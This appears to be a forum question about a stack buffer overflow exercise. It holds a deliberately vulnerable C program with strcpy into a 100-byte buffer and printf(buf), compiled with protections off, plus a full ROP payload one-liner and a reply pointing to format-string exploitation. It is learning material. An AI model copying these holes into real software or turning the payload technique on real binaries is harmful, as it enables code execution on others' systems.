I have the following problem: I have this C program and I have done buffer overflow using ROP gadgets. I have a problem with the output.
I want to stop the printf() call in the vuln function to get the right output but how can I achieve that with the ROP chain?
My program is compiled with gcc.
Compilation:
gcc -m32 -fno-stack-protector -no-pie -o rop rop.c
Payload:
Overflow + secret adress + secret adress +the adress of pop ebx ; ret +
the right Parameter for the secret Function + just_another_secret_function adress
+ the adress of pop edi ; pop ebp ; ret+ the right Parameter for just_another_secrect_function + exit adress
The Input:
./rop "$(python2 -c 'print "A"*112 + "\xd6\x91\x04\x08"+ "\xd6\x91\x04\x08" + "\x53\x93\x04\x08" + "\x41\x46\x46\x45" + "\x24\x92\x04\x08" + "\x52\x93\x04\x08" + "\x01" + "\xde\x92\x04\x08"')"
SourceCode:
#include <stdio.h>
#include <string.h>
void secret(int magic)
{
if(magic == 0x45464641) printf("Right!\n");
else printf("Wrong!\n");
}
void just_another_secret_function(unsigned char one)
{
if(one == 1) printf("Well done!\n");
}
void vuln (char *s)
{
char buf[100];
strcpy(buf, s);
printf(buf);
}
int main (int argc, char **argv)
{
if(argc>1) vuln(argv[1]);
return 0;
}
The output should be like this:
Wrong!
Right!
Well done!
and I am getting this output:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAFFE$RWrong!
Right!
Well done!
bufwhich is a local var tovuln()and you won't be able to pivot untilvuln()returns which is when the epilog pops your controlled data of the stack into RIP. This occurs after theprintf()call. Format string might be what you're looking for..... (Otherwise you can cheat by using \r at the start of your payload (depending on your shell))